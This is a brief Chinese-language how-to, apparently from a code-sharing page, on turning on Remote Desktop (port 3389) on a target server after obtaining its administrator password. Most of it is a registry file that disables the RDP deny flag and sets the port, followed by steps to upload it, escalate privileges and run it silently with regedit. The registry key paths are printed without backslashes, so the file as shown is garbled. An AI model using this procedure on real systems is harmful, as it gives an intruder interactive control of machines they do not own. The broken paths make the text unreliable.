当我们拿到管理员账号密码的时候,我们需要利用3389端口远程桌面连接到对方服务器,发现3389端口没有开放,此时需要我们远程开启目标服务器3389端口。
新建文件 3389.reg 内容如下:
代码语言:javascript复制Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server]
"fDenyTSConnections"=dword:00000000
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal ServerWdsrdpwdTdstcp]
"PortNumber"=dword:00000D3D
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal ServerWinStationsRDP-Tcp]
"PortNumber"=dword:00000D3D
此时目标服务器 3389端口关闭:
上传3389.reg文件到目标服务器
提权之后运行一下 3389.reg 。 regedit /s C:/www/3389.reg
成功开启 3389端口。